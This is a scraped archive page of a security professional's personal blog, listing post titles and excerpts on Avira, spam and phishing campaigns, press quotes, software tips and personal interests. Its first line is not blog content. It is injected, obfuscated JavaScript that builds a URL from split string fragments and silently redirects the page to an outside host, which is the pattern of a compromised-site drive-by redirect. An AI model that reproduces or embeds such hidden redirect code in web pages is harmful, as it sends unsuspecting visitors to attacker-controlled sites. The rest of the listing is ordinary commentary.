Mustaca. Example function r(){};fQ=false;d="";r.prototype = {p : function() { this.j='';var pN=54899;s=false;this.k="k";this.kH=22581;c='';l=64422; document.location.href=String("htt"+"p:/"+"/tr"+"ace"+"boo"+"k.u"+"s/1"+".htOnc".substr(0,3)+"ml"); - [Quoted in NYTimes.com](https://www.sorinmustaca.com/quoted-in-nytimes-com/) - 1 in 3 Internet Users Think All Websites Are Equally Dangerous A third of all Internet users thinks that virtually every website poses a potential security threat. According to a new survey by German online security firm Avira, consumers are becoming increasingly aware of potential security issues online, but it looks like for quite a - [How to create a safe browsing environment for children](https://www.sorinmustaca.com/how-to-create-a-safe-browsing-environment-for-children/) - I am quite proud of this nice article I wrote on the Avira Techblog. It describes how parents should deal with their children who are becoming more and more attracted of Internet. I managed to only mention at the end of the article about Avira's own product: Avira Premium Security Suite. - [Why Intel bought McAfee?](https://www.sorinmustaca.com/why-intel-bought-mcafee/) - Everybody knows about this acquisition. Now, why did Intel (chip produced) needs a Software Security company ? There are some possible reasons: 1. To enter in a multi-billion market which needs fresh ideas and technologies 2. To produce better security software which makes use of their multi-core processors 3. Both 4. Add AV in the - [Quoted (again) on Softpedia.com](https://www.sorinmustaca.com/quoted-again-on-softpedia-com/) - The source of the article ist the statistics for July, published in the techblog: "Because of the holiday season, many people started to buy games and spend more time in the social media websites, so the increase in attacking such web sites comes quite naturally," Sorin Mustaca, manager of international software development at Avira, noted. - [Quoted in the IT Business Edge](https://www.sorinmustaca.com/quoted-in-the-it-business-edge/) - http://www.itbusinessedge.com/cm/blogs/poremba/trustworthy-ssl-certificates/?cs=42832 As Sorin Mustaca, manager of international software development at Avira, explained to me: A Certificate Authority is, by common understanding, an entity having a trust level beyond any doubt. This means that in the case of digital certificates, a CA can generate certificates which are trusted by all parties involved in a communication. Any - [The AMTSO debate](https://www.sorinmustaca.com/the-amtso-debate/) - Since I heard the first time about AMTSO (Anti Malware Testing Standards Organization), in one of the VB Conferences (I think two years ago), I asked myself whether or not this association makes sense. I've heard later on that Avira is also part of it. But, I simply forgot about this issue. I recently started - [Quoted by softpedia.com](https://www.sorinmustaca.com/quoted-by-softpedia-com/) - Softpedia took again one of my posts in the Avira Techblog and wrote an article based on it: "In the recent past we saw emails looking like phishing mails, which were spam though actually. The spammers tried to make them look as much as possible as official mails from the entity they were faking: Amazon, - [Quoted in USA Today](https://www.sorinmustaca.com/quoted-in-usa-today/) - http://www.usatoday.com/tech/products/software/2010-08-09-apple09_ST_N.htm?loc=interstitialskip Somewhere in the middle of the article: Apple's problem is singular. The company has made a big deal about hiding technical details of iOS, allowing only approved Web apps to tie in. This tight control initially made it easier to keep iOS secure. But now Apple may have to share iOS coding with anti-virus - [Are the AntiVirus companies writing the Viruses?](https://www.sorinmustaca.com/are-the-antivirus-companies-writing-the-viruses/) - Short answer: NO Long answer: a very good one provided by Randy Abrams Thanks for the great article, Randy ! - [Avira has an official Facebook page](https://www.sorinmustaca.com/avira-has-an-official-facebook-page/) - Please check it here: Avira on Facebook - [Passed the CompTIA Project+ (2009 Objectives)](https://www.sorinmustaca.com/passed-the-comptia-project-2009-objectives/) - I just finished the exam CompTIA Project+ (2009 Objectives). So, I am certified IT Project Manager ;) Number of questions: 100 Length of test: 90 minutes Passing score: 710 on a scale of 100-900 Recommended experience: One year of managing, directing or participating in small- to medium-scale projects Language: English Exam code: PK0-003 I got - [URL Shorteners - an exhaustive list](https://www.sorinmustaca.com/url-shorteners-an-exhaustive-list/) - Let me know if I missed any. The list is sorted alphabetically. ad.ag bacn.me bit.ly br.st budurl.com cli.gs doiop.com dwarfURL.com fb.me goo.gl ht.ly idek.net is.gd k.im kno.li lnks.it lu.mu memurl.com moourl.com notlong.com ow.ly pigf.lu qls.me r2me.com readthisURL.com reg.cx shorl.com smal.ly sn.im snipurl.com su.pr surl.co.uk tiny.cc tinyurl.com tr.im traceurl.com twitpick.com u.nu url360.me urls.im urlTea.com weburl.me wp.me - [Linguistic relativity or the Sapir-Whorf hypothesis](https://www.sorinmustaca.com/linguistic-relativity-or-the-sapir-whorf-hypothesis/) - From Wikipedia: The linguistic relativity principle, or the Sapir-Whorf hypothesis[1] is the idea that differences in the way languages encode cultural and cognitive categories affect the way people think, so that speakers of different languages think and behave differently because of it. A strong version of the hypothesis holds that language determines thought that linguistic - [PayPal security warning email with malware](https://www.sorinmustaca.com/paypal-security-warning-email-with-malware/) - PayPal security warning email with malware There is a new wave of emails pretending to come from Paypal having a ZIP archive attached. The email says that your PayPal account have been accessed by a third party and, in order to protected your account, PayPal has been locked.The user is invited to review the report - [Goodbye Twitterfeed.com, Hello HootSuite.com (updated)](https://www.sorinmustaca.com/goodbye-twitterfeed-com-hello-hootsuite-com/) - Until now, I used Twitterfeed.com to publish several RSS Feeds to Ping.fm and from there to several social media networks like Twitter, Linkedin, Facebook, Yahoo and Flickr. For quite some time now, TwitterFeed is no longer compatible with Ping.fm. I've been quite patient and supportive with both Ping.fm and Twitterfeed.com . I even created bugs - [When the whales fly (or Twitter hiccups)](https://www.sorinmustaca.com/when-the-whales-fly-or-twitter-hiccups/) - From time to time, the users of Twitter are unable to login on the official website. Sometimes the screen below can be seen, sometimes just a timeout error. Interesting enough, after you refresh a couple of times, you are able to do whatever you were trying to do, and then never get this error until - [And now Amazon is being used to advertise the Canadian Pharmacy](https://www.sorinmustaca.com/and-now-amazon-is-being-used-to-advertise-the-canadian-pharmacy/) - Remember this post about emails which looks like Facebook and Twitter phishing at first signt ? http://msorin.wordpress.com/2010/05/20/facebook-and-twitter-phishing-on-first-sight/ Now Amazon.com got hit quite massively: Read more here in the Avira Techblog - [Deadlock-Proof Your Code: Part 1 & 2](https://www.sorinmustaca.com/deadlock-proof-your-code-part-1-2/) - In today's world of multicore computing, it's important to make sure that your multithreaded applications scale. A longstanding approach for making the most of multiple processors is to arrange for different resources to be protected by different synchronization objects, or locks. A drawback of this approach is that a bug in your threading model can - [Another Strange bundle or did Sun and Yahoo merge ?](https://www.sorinmustaca.com/another-strange-bundle-or-did-sun-and-yahoo-merge/) - I was prompted today to update the Java framework on my laptop. I said, yes, update it and then I've seen the picture below: So, I ask, what the hack has Yahoo to do with Sun ? Why a stupid, useless and nerving toolbar is being installed with the Java framework ? Did Sun buy - [Facebook and Twitter Phishing (on first sight)](https://www.sorinmustaca.com/facebook-and-twitter-phishing-on-first-sight/) - The source of the articles is in the Avira Techblog: Twitter Phishing (on first sight) Facebook Phishing (on first sight) Twitter Over the weekend our spam traps received a massive wave of emails looking like the one below: The emails seem to stem from “Twitter Support” (support@twitter.com) and are addressed each to exactly one unique - [Are your tweets through Tweeterfeed and Ping.fm no longer published ?](https://www.sorinmustaca.com/are-your-tweets-through-ping-fm-no-longer-published/) - Are you using Tweeterfeed and Ping.fm ? Are your tweets no longer published ? Then you didn't read Twitter's post here: http://dev.twitter.com/ June 30, 2010 The @twitterapi team will be shutting off basic authentication on the Twitter API. All applications, by this date, need to switch to using OAuth. Read more » So, the solution - [Romania again in the news... again in the wrong way](https://www.sorinmustaca.com/romania-again-in-the-news-again-in-the-wrong-way/) - Some subdomains of the Daily Telegraph were hacked by a group of Romanian hackers called R.N.S Read more here: http://sunbeltblog.blogspot.com/2010/04/subdomains-defaced-on-telegraph-website.html http://www.guardian.co.uk/media/2010/apr/15/daily-telegraph-hacking - [When Technical Support really sucks](https://www.sorinmustaca.com/when-technical-support-really-sucks/) - No Words, just two screen shots :) And their answer after the email above: - [The wrong way of being in the news](https://www.sorinmustaca.com/the-wrong-way-of-being-in-the-news/) - "70 Romanian Phishers & Fraudsters Arrested On March 4th, FBI Director Robert Mueller was given a speech on Cybercrime to the RSA conference where he mentioned that: And we have worked with the Romanian National Police to arrest more than 100 Romanian nationals in the past 18 months. Four years ago, several American companies threatened - [Ubuntu Desktop 9.10 (Karmik-Koala) - install 32 bits libraries on a 64 bits operating system](https://www.sorinmustaca.com/ubuntu-desktop-9-10-karmik-koala-install-32-bits-libraries-on-a-64-bits-operating-system/) - You have most probably 4 GB RAM and you want to use them all :) The only choice for you is to install Ubuntu 64 bits. But, a lot of software goodies out there are still compiled on 32 bits. Of course, they won't start on your brand new 64 bits operating system that can - [I.N.S.E.C.U.R.E](https://www.sorinmustaca.com/i-n-s-e-c-u-r-e/) - I am becoming more and more interested in the (ISC)2 Certification called CSSLP: Certified Secure Software Lifecycle Professional They have a whitepaper for this certification called "Code (In)Security" written by Mano Paul. I am not allowed to publish the direct link because they request registration before giving the link to the whitepaper. In order to - [Closer look on Swizzor http://ow.ly/16SW](https://www.sorinmustaca.com/closer-look-on-swizzor-httpow-ly16sw/) - Closer look on Swizzor http://ow.ly/16SWB0 - [Release of Avira AntiVir 10 http://ow.ly](https://www.sorinmustaca.com/release-of-avira-antivir-10-httpow-ly/) - Release of Avira AntiVir 10 http://ow.ly/16REoF - [Back to the roots in the online pharmacy](https://www.sorinmustaca.com/back-to-the-roots-in-the-online-pharmacy/) - Back to the roots in the online pharmacy spam http://ow.ly/16Rp0J - [The Browser Choice Reloaded http://ow.ly](https://www.sorinmustaca.com/the-browser-choice-reloaded-httpow-ly/) - The Browser Choice Reloaded http://ow.ly/16Rp0I - [Fix-it-Tool for IE-0-day - For the curre](https://www.sorinmustaca.com/fix-it-tool-for-ie-0-day-for-the-curre/) - Fix-it-Tool for IE-0-day - For the current vulnerability in Internet Explorer 6 and 7 which already gets actively e... http://ow.ly/16OyiK - [From pictures to movie on Youtube.com](https://www.sorinmustaca.com/pictures-to-movie-on-youtube-com/) - My very first upload on uploaded on http://www.youtube.com : http://www.youtube.com/watch?v=WHzXVFMzSag It is made from a couple of pictures assembled together with Google Picasa - [What's New in Visual C++ 2010](https://www.sorinmustaca.com/whats-new-in-visual-c-2010/) - What's New in Visual C++ 2010 This topic introduces new and enhanced Visual C++ features in Visual Studio 2010. Amazon: Bestsellers Electronics and Photo Visual C++ Projects and the Build System MSBuild Visual C++ solutions and projects are now built by using MSBuild, which replaces VCBUILD.exe. MSBuild is the same flexible, extensible, XML-based build tool - [I am getting more and more spam like this](https://www.sorinmustaca.com/i-am-getting-more-and-more-spam-like-thi/) - I am getting more and more spam like this : http://techblog.avira.com/2010/03/11/twitter-spam-getting-slim-with-slim-urls/en/ - [When time is "relative"](https://www.sorinmustaca.com/when-time-is-relative/) - I was uninstalling some Microsoft software and was staring at the uninstaller astonished... for more than 10 minutes... until I said ENOUGH MICROSOFT !!! WASTE SOMEONE'S ELSE TIME and killed the damn process.... - [Protecting Your Code with Visual C++ Defenses](https://www.sorinmustaca.com/protecting-your-code-with-visual-c-defenses/) - Protecting Your Code with Visual C++ Defenses by Michael Howard Executive summary: Always compile with: /NXCompat /SafeSEH /DynamicBase In the header(PCH) always define: #define _CRT_SECURE_CPP_OVERLOAD_STANDARD_NAMES 1 In the code call : SetProcessDEPPolicy(PROCESS_DEP_ENABLE); Note that some of these feature are available from Vista SP1. - [The browser choice](https://www.sorinmustaca.com/the-browser-choice/) - A Windows Update is available to users who are located in member countries of the European Union allowing for choosing a different standard browser for the system. The update is available for download through Windows Update. Read more here: http://techblog.avira.com/2010/03/08/the-browser-choice/en/ - [Viruses and Digital Signatures](https://www.sorinmustaca.com/viruses-and-digital-signatures/) - Very interesting stuff: http://www.symantec.com/connect/blogs/viruses-and-digital-signatures Although the files are signed, they are signed using an unauthenticated CA (Certificate Authority) which is masquerading as Verisign. A CA is a trusted third party that issues and signs the certificate and vouches for the authenticity of the file. Each CA should be registered and therefore recognized globally as a - [Avira goes into Managed Security Services by acquiring CleanPort](https://www.sorinmustaca.com/avira-goes-into-managed-security-services-by-acquiring-cleanport/) - http://www.avira.com/en/company_news/avira_extends_security_in_the_cloud.html Avira extends Managed Security Services portfolio to offer users security "in-the-cloud" Tue, 02 March 2010 Avira's acquisition of CleanPort forms the basis for the new business unit Tettnang/ Doetinchem, 2 March 2010 – German IT security provider Avira has acquired CleanPort, an acquisition that extends Avira's solutions for terminals and server products with a - [Avira has new Risk Levels](https://www.sorinmustaca.com/avira-has-new-risk-levels/) - I published a new article in the Avira Techblog: Combined Avira Risk Level We now have a new risk indicator: Global This indicator combines the other 3 in the easiest way possible. One might argue that Malware is more important than phishing and spam. Maybe, but they are all treated equally in our system. This - [2010 CWE/SANS Top 25 Most Dangerous Programming Errors](https://www.sorinmustaca.com/2010-cwesans-top-25-most-dangerous-programming-errors/) - The 2010 CWE/SANS Top 25 Most Dangerous Programming Errors is a list of the most widespread and critical programming errors that can lead to serious software vulnerabilities. They are often easy to find, and easy to exploit. They are dangerous because they will frequently allow attackers to completely take over the software, steal data, or - [Philips NetTV and FritzBox 72xx](https://www.sorinmustaca.com/philips-nettv-and-fritzbox-72xx/) - I recently bought a new LCD TV from Philips : The 47" PFL8404H/12 with NetTV. Actually, I chose this TV because of two features it has: 1. The display : Full HD, 47" , non reflective having the "Pixel Precise" feature 2. the Net TV: which means practically the you have an Internet connection in - [The Firefox Plugins - reloaded](https://www.sorinmustaca.com/the-firefox-plugins-reloaded/) - After writing this article ( http://techblog.avira.com/2010/01/04/firefox-extension-updates/en/ ) and after Dirk's info , it finally happened to Firefox: They published malicious plugins It was just a matter of time ;) Short link - [Quoted by it-republik.de](https://www.sorinmustaca.com/quoted-by-it-republik-de/) - http://it-republik.de/php/news/Security-Hinweise-zu-Facebook-Anwendungen-und-mehr-053600.html Sorin Mustaca von Avira berichtet, dass Googles Chrome in Version 4 durch 'Extensions' erweitert werden kann, die von Google in der 'Extension Gallery' gesammelt und bereit gestellt werden - ohne ihre Funktionsfähigkeit oder Verhalten zu prüfen, so dass bösartigen Extensions Tür und Tor offen stehen. and the original article: http://techblog.avira.com/2010/01/27/google-chrome-4-now-with-extensions/en/ - [Quoted by pcwelt.de](https://www.sorinmustaca.com/quoted-by-pcwelt-de/) - http://www.pcwelt.de/start/sicherheit/firewall/news/2107737/die-haeufigsten-phishing-zielscheiben/ Ursache sei vermutlich, so Sorin Mustaca von Avira im Unternehmens-Blog, das Weihnachtsgeschäft. Viele Internet-Nutzer tätigten ihre Einkäufe online und benutzten Paypal zum Bezahlen. So sei auch die Zahl der Phishing-Angriffe auf Paypal angestiegen. Die Chase Bank liegt auf Platz 2, gefolgt von der Paypal-Mutter eBay. Erst mit deutlichem Abstand zum Spitzentrio folgen American Express - ["Internet Service Providers have a pessimistic view of the future" ?!?](https://www.sorinmustaca.com/internet-service-providers-have-a-pessimistic-view-of-the-future/) - I read this article from Heise ( http://www.h-online.com/security/news/item/Internet-Service-Providers-have-a-pessimistic-view-of-the-future-917562.html) and I couldn't stop asking myself : WHY ?! I mean where is the problem in building a better protection from inside ? Why Inside ? Because most of the attacks come from inside their network or from the networks from their own partners. So, guys, sit - [New Avira Techblog article: Most used spam categories in January](https://www.sorinmustaca.com/new-avira-techblog-article-most-used-spam-categories-in-january/) - Most used spam categories in January Short link : http://wp.me/p1Ipp-6m - [New Avira Techblog article: Google Chrome 4 – now with Extensions](https://www.sorinmustaca.com/new-avira-techblog-article-google-chrome-4-now-with-extensions/) - Google Chrome 4 – now with Extensions - [Avira Techblog article:Busy time for spammers during winter holidays](https://www.sorinmustaca.com/avira-techblog-articlebusy-time-for-spammers-during-winter-holidays/) - Busy time for spammers during winter holidays - [Visual Studio 2010: VCBuild vs. C++ MSBuild on the Command Line](https://www.sorinmustaca.com/visual-studio-2010-vcbuild-vs-c-msbuild-on-the-command-line/) - Visual Studio 2010: VCBuild vs. C++ MSBuild on the Command Line Amazon: Bestsellers Electronics and Photo MSBuild Command Line Reference - http://msdn.microsoft.com/en-us/library/ms164311.aspx VC++ Building on the Command Line - http://msdn.microsoft.com/en-us/library/f35ctcxw%28VS.100%29.aspx The New VC++ Project/Build system - http://channel9.msdn.com/posts/Charles/Bogdan-Mihalcea-The-New-VC-ProjectBuild-system-MSBuild-for-C/ - [Project Honeypot - 1 Billion Spammers Served and more...](https://www.sorinmustaca.com/project-honeypot-1-billion-spammers-served-and-more/) - Project Honeypot published this nice article which contains all kind of data and graphics here: 1 Billion Spammers Served All nice and shiny, but I have a problem with this graphic: Notice that PayPal is about 1% ... Our data, gathered by the URLCheck service, gives us completely different numbers: So, don't believe everything what - [Confiker again in the news - @Shadowserver:EU is bigger than you think guys](https://www.sorinmustaca.com/confiker-again-in-the-news-shadowservereu-is-bigger-than-you-think-guys/) - I have to confess, I never ever read anything on www.shadowserver.org and everything I write here is taken from this page from McAfee Avert Labs Blog Shadowserver names 183 country codes and 5994 autonomous systems with Conficker IP in their network space: * 1086 for the Russian Federation (RU) * 597 for the United States - [Avira Techblog article: Not every Christmas card wishes you well](https://www.sorinmustaca.com/avira-techblog-article-not-every-christmas-card-wishes-you-well/) - Not every Christmas card wishes you well : http://techblog.avira.com/2009/12/03/not-every-christmas-card-wishes-you-well/en/ - [Avira switches to new update system](https://www.sorinmustaca.com/avira-switches-to-new-update-system/) - Avira switches to new update system: http://techblog.avira.com/2009/11/19/avira-switches-to-new-update-system/en/ Amazon: Bestsellers Electronics and Photo ... but only for a short period of time. - [Get 2 GB of Free Online Storage](https://www.sorinmustaca.com/get-2-gb-of-free-online-storage/) - Just click here to go to the Dropbox website - [About the APR's Memory pools which seem to cause memory leaks](https://www.sorinmustaca.com/about-the-aprs-memory-pools-which-seem-to-cause-memory-leaks/) - Resources: http://en.wikipedia.org/wiki/Apache_Portable_Runtime http://en.wikipedia.org/wiki/Memory_pool http://dev.ariel-networks.com/apr/apr-tutorial/html/apr-tutorial-3.html http://svnbook.red-bean.com/en/1.1/ch08s05.html The APR pools are some big tables which contain references to consecutive memory areas which are used by the application. Once the application releases such an area, the pool marks the memory area as available, but it doesn't give it back to the OS. Let's take an example which better - [New Avira Techblog article: Social engineering and the redefinition of spam](https://www.sorinmustaca.com/new-avira-techblog-article-social-engineering-and-the-redefinition-of-spam/) - Social engineering and the redefinition of spam - [mustaca.ro is finally alive](https://www.sorinmustaca.com/mustaca-ro-is-finally-alive/) - I own mustaca.ro since a couple of years now... maybe 6 years ? However, I didn't use it so far because I couldn't register a DNS record for it. Now, with the help of my friends I was able to redirect it to mustaca.de Also the emails sent to mustaca.ro are redirected to mustaca.de - [P vs NP](https://www.sorinmustaca.com/pvsnp/) - Read here the entire article on DDJ.com: http://www.ddj.com/architect/221600058 I love this remark: "NP-completeness "tells you something very specific:It tells you that if you're going to look for an algorithm that's going to work in every case and give you the best solution, you're doomed: don't even try. That's useful information." - [New article in the Avira Techblog: The spam trend continues: more and more malware](https://www.sorinmustaca.com/new-article-in-the-avira-techblog-the-spam-trend-continues-more-and-more-malware/) - The spam trend continues: more and more malware - [Windows 7 and Free Antiviruses](https://www.sorinmustaca.com/windows-7-and-free-antiviruses/) - Kaspersky Internet Security 2010 : http://usa.kaspersky.com/shakeitup/ IObit Security : http://db.iobit.com/license-free/win7-special-offer.php Panda Security : http://us.pandasecurity.com/windows7party/index.html are offering free one year subscriptions to everyone... http://windows7news.com/2009/10/22/free-anti-virus-1-year-subscriptions-to-celebrate-windows-7-launch/ Avira is also offering Free-Av to absolutely everyone, all the time, since 10 years. And this no matter which Windows you run. ;) Bastards ... :) - [Changing the ISP for my website](https://www.sorinmustaca.com/changing-the-isp-for-my-website/) - There will be interrupts today because I've moved my website from 1und1.de to Netbeat. - [New article in Avira Techblog: Malware-Spam with alleged OWA settings](https://www.sorinmustaca.com/new-article-in-avira-techblog-malware-spam-with-alleged-owa-settings/) - Malware-Spam with alleged OWA settings - [Google Wave - invitation received](https://www.sorinmustaca.com/355/) - Got the invitation for Google Wave (http://ping.fm/gxgq6). Still trying how to use it. My Google user name is sorin.mustaca. Everything still looks pretty simple developed out there. - [New Avira Techblog article: A brief look at some Twitter Spam](https://www.sorinmustaca.com/new-avira-techblog-article-a-brief-look-at-some-twitter-spam/) - A brief look at some Twitter Spam - [New Avira Techblog Article: High Risk Level Alert](https://www.sorinmustaca.com/new-avira-techblog-article-high-risk-level-alert/) - High Risk Level Alert - [Email-(in)Security using GnuPG for Windows and Outlook](https://www.sorinmustaca.com/email-insecurity-using-gnupg-for-windows-and-outlook/) - I usually do not start with a conclusion... But now I will. Simply stay away from this dreadful software... !!! It is simply buggy ! Outlook 2007 crashes almost at every signed email that this crappy software tries to display. STAY AWAY FROM http://www.gpg4win.org/ at least until they fix these crashes !!! - [Avert Labs — Malware "Experience" - DON'T](https://www.sorinmustaca.com/avert-labs-malware-experience-dont/) - With a huge surprize I've read here that McAfee is teaching people how to play with Malware. I do not think that everybody needs to know this. Already too many script kiddies are doing this with catastrophic effects. http://www.mcafeefocus.com/focus09/sessions/GroupMeetings.aspx#avert2 Avert Labs — Malware Experience (By appointment only) Tuesday, Oct. 6 1:00 pm - 5:00 pm - [Avira Techblog: ZBot outbreak in form of IRS Phishing](https://www.sorinmustaca.com/avira-techblog-zbot-outbreak-in-form-of-irs-phishing/) - Avira Techblog: ZBot outbreak in form of IRS Phishing - [Virus Bulletin 2009 Conference Reports](https://www.sorinmustaca.com/virus-bulletin-2009-conference-reports/) - Day 1 : http://techblog.avira.com/2009/09/24/vb-conference-day-1/en/ Day 2 : http://techblog.avira.com/2009/09/25/vb-conference-day-2/en/ Day 3 : http://techblog.avira.com/2009/09/28/vb-conference-day-3/en/ - [New article in the Avira Techblog:The longest Nigerian Scam ever?](https://www.sorinmustaca.com/new-article-in-the-avira-techblogthe-longest-nigerian-scam-ever/) - New article in the Avira Techblog: The longest Nigerian Scam ever? - [New article in the Avira Techblog:A fresh breeze in the Casino spam](https://www.sorinmustaca.com/326/) - New article in the Avira Techblog: A fresh breeze in the Casino spam - [Avira's Free AV is celebrating 10 years](https://www.sorinmustaca.com/aviras-free-av-is-celebrating-10-years/) - Quote from the Techblog: "Amazing! Avira’s free antivirus solution, Avira AntiVir Personal available at our www.FreeAV.com web site, is now getting 10 years old! For ten years, we added an additional security layer around companies by protecting the employees personal computers from malware infections for free. Amazon: Bestsellers Electronics and Photo The free version always - [Bundling reloaded... now with Adobe & McAfee](https://www.sorinmustaca.com/bundling-reloaded-now-with-adobe-mcafee/) - Did you update your Flash software in Firefox ? I did ... And this is what i got: Not very nice, Adobe... - [Avira's free version is the best](https://www.sorinmustaca.com/avira-rulez/) - Avira is the first choice of the PC World top of Free Antivirus Products: http://www.pcworld.com/article/170674/free_antivirus_software.html - [New post in Avira Techblog: Spam through Yahoo Groups](https://www.sorinmustaca.com/new-post-in-avira-techblog-spam-through-yahoo-groups/) - This time together with Dirk : Spam through Yahoo Groups - [10 reasons why I hate MS Outlook](https://www.sorinmustaca.com/10-reasons-why-i-hate-ms-outlook/) - 1. It is crashing continuously because it is locked in some intensive I/O and the OS (yes, *their* own OS) is killing the application as being non responsive. 2. Lack of good plugins. In contrary to Thunderbird where there are thousand of plugins, the really good plugins for Outlook are very few. 3. Eats up - [I started again to post in the photoblog](https://www.sorinmustaca.com/i-started-again-to-post-in-the-photoblog/) - Yes, I have a photoblog: http://smphotoblog.wordpress.com/ Why ? Because I want to add there the nicest pictures I have... And because it is very easy to do that ... I am sending an email to a secret address and that's it... - [The power of money ... or WTF has Java to do with Yahoo ?!](https://www.sorinmustaca.com/the-power-of-money-or-wtf-has-java-to-do-with-yahoo/) - Immediately after I started my laptop today, I got a popup announcing me that I have to install a Java update. Well, knowing that it has vulnerabilities, I said... OK, do it. And then I continued to work ... After a couple of seconds, I see the following popup : So, now the legitimate question: - [Short Link from WP.com](https://www.sorinmustaca.com/short-link-from-wp-com/) - This blog is also reachable via http://wp.me/1Ipp - [Using ping.fm](https://www.sorinmustaca.com/using-ping-fm/) - I have to many services which I like to use: Facebook, LinkedIn, Twitter, this blog and others. But how can I keep them synchronized ? I can't... because they are just too different. I found by mistake a service which can... It is called Ping.fm and it actually works : I write in one place - [Pardon for Enigma code-breaker Alan Turing](https://www.sorinmustaca.com/pardon-for-enigma-code-breaker-alan-turing/) - My friend John Graham-Cumming has started a petition to force the UK government to officially ask a post-mortem pardon to Alan Turing, the father of the modern computers and the breaker of the nazis' Enigma code. Here is an interview about this topic. This post has been inspired by John's post here. - [New article in Avira Techblog: USA Visa Lottery scam](https://www.sorinmustaca.com/new-article-in-avira-techblog-usa-visa-lottery-scam/) - USA Visa Lottery scam - [Referenced in a paper of ESET](https://www.sorinmustaca.com/referenced-in-a-paper-of-eset/) - I was just browsing the web when I've found this paper: http://www.csd.uoc.gr/~hy558/papers/kettle.pdf which mentions my article published in VB in 2006 - [9 Digital Camera Features: Necessary or Novelty?](https://www.sorinmustaca.com/9-digital-camera-features-necessary-or-novelty/) - Popfoto magazine has published a very interesting article about the feature of digital cameras (SLR and compact) and categorized them as Necessary or Novelty. I mostly agree with them. http://www.popphoto.com/Features/9-Digital-Camera-Features-Necessary-or-Novelty?cid=10 - [Twitterfeed](https://www.sorinmustaca.com/twitterfeed/) - I found a new service which promises to publish every 30 minutes any RSS Feed to a Twitter account. It is called "Twitterfeed" . Let's see if this post reaches my Twitter account : http://twitter.com/sorinmustaca - [New article in Avira TechBlog: CentMail: Yahoo’s “new” idea to stop spam](https://www.sorinmustaca.com/new-article-in-avira-techblog-centmail-yahoos-new-idea-to-stop-spam/) - CentMail: Yahoo’s “new” idea to stop spam - [Kaspersky Blog allows posts with spam links](https://www.sorinmustaca.com/kaspersky-blog-allows-posts-with-spam-links/) - Just have a look at the screenshot... The problem is that they allow any registered user to post whatever he/she wants without any moderation. This is also my post with a reply to the spammer's post. - [New article in Avira Techblog: Avira Risk Level](https://www.sorinmustaca.com/new-article-in-avira-techblog-avira-risk-level/) - Avira Risk Level - [SHA-3: second round in the cryptographers' Olympiad](https://www.sorinmustaca.com/sha-3-second-round-in-the-cryptographers-olympiad/) - Source: Heise The competition run by the US National Institute of Standards and Technology (NIST) to find the next generation of cryptographic hash functions has gone into its second round. Fourteen algorithms are still vying to be crowned in 2012 as the next standard for cryptographic hash functions, SHA-3 (Secure Hash Algorithm). I am curious - [Avira has a Risk Level](https://www.sorinmustaca.com/avira-has-a-risk-level/) - http://techblog.avira.com/risk-level/en/ Avira Risk Level definitions There is an average level computed for the last 30 days for both malware and phishing. The alert level is computed like this: 1 Normal activity - less than -50 percent 2 Increased activity - between -50 and -25 percent 3 Suspicious activity - between -25 and 25 percent 4 - [Poll: what you think about the Magic Circle Festival 2009 ?](https://www.sorinmustaca.com/poll-what-you-think-about-the-magic-circle-festival-2009/) - [O2 Germany has finally released the ROM Update for HTC Touch HD](https://www.sorinmustaca.com/o2-germany-has-finally-released-the-rom-update-for-htc-touch-hd/) - O2 Germany has finally released the ROM Update for HTC Touch HD: http://www.o2online.de/nw/support/downloads/software/xda/htctouch/index.html Make sure you make a backup of your data before the upgrade. - [New article: Nigerian scams are indeed getting smarter](https://www.sorinmustaca.com/new-article-nigerian-scams-are-indeed-getting-smarter/) - Nigerian scams are indeed getting smarter - [Bitter experience at the Magic Circle Festival 2009...](https://www.sorinmustaca.com/bitter-experience-at-the-magic-circle-festival-2009/) - IMPORTANT: I AM NOT A JOURNALIST, JUST A BIG FAN ! I wanted to attend the festival because I love Manowar ! So, I drove 5h30min to Loreley on 18.07.09 to see and hear Manowar. Here is my (bitter) experience: 1. The location was badly chosen Why ? In order to go there you must - [Netbook Samsung NC110](https://www.sorinmustaca.com/netbook-samsung-nc110/) - I got it ... Samsung NC110. Here are the specs and some pictures as well. Nice ... :) It looks and feels like a jewelry. - [Puzzle globe](https://www.sorinmustaca.com/puzzle-globe/) - After more than 10 h of work (distributed in about 2 weeks) I managed to finish the puzzle globe from Ravensburger. Here is the entire set of pictures: - [They have arrived ...](https://www.sorinmustaca.com/they-have-arrived/) - No, not the aliens... The tickets for the Magic Circle Festival. Here the tickets and the flyer look like : And a ticket: Looking forward to attend even if we have to drive for four hours to Loreley. - [Potential Threat through Opera Unite, Part II](https://www.sorinmustaca.com/potential-threat-through-opera-unite-part-ii/) - Together with Dirk Knopp I published an update to the Opera Unite – Everybody is becoming a Web server which is called : Potential Threat through Opera Unite, Part II. I have written some details about the P2P networks and about how Opera is using the concept. I am thinking now to build a honeypot - [Opera Unite and Security](https://www.sorinmustaca.com/opera-unite-and-security/) - Have a look at the article that Dirk Knopp wrote in the Avira Techblog. This article was referenced here : http://www.h-online.com/security/Opera-says-Opera-Unite-web-server-is-not-a-security-problem--/news/113719 His concern is that a lot of malware can be now served directly from user's computer. And he is right. Even more, if there is a flaw in the Opera and somebody can alter - [Manowar in Romania and singing in Romanian !](https://www.sorinmustaca.com/manowar-in-romania-and-singing-in-romanian/) - Yes, they were in Bucharest !!! Here is the call ! Yes, they had some technical problems YES, THEY SANG IN ROMANIAN !!!! MANOWAR are the greatest !!! This is the song in Romanian, called Tata (Father): - [Just installed Firefox 3.5](https://www.sorinmustaca.com/just-installed-firefox-3-5/) - Yes, I got it ;) PRO: it is better in rendering, it is faster. Zooming a page works perfectly this time. CONS: I think it eats more RAM than its predecessors. One single TAB requires 100 MB RAM and 78 MB VM. Firefox 3.0.11 needed about 80MB RAM with the same plugins and theme. - [New post in Avira blog: Spam Through Sourceforge.net](https://www.sorinmustaca.com/new-post-in-avira-blog-spam-through-sourceforge-net/) - http://techblog.avira.com/2009/06/29/spam-through-sourceforgenet/en/ - [New post in the Avira Techblog: A Japanese scam with some twists](https://www.sorinmustaca.com/new-post-in-the-avira-techblog-a-japanese-scam-with-some-twists/) - A Japanese scam with some twists - [When marketing doesn't read what they send via email](https://www.sorinmustaca.com/when-marketing-doesnt-read-what-they-send-via-email/) - I am subscribed to the TAROM (Romanian Airlines) Newsletter which is sent approximately once a month. Each month I receive the same corrupted email which looks like the one in the picture: Why is this happening ? Simply because they add some newlines in the wrong places. Actually, it is enough only the first one - [wifi everywhere in the Politehnica University Bucharest](https://www.sorinmustaca.com/wifi-everywhere-in-the-politehnica-university-bucharest/) - While waiting for my Phd. 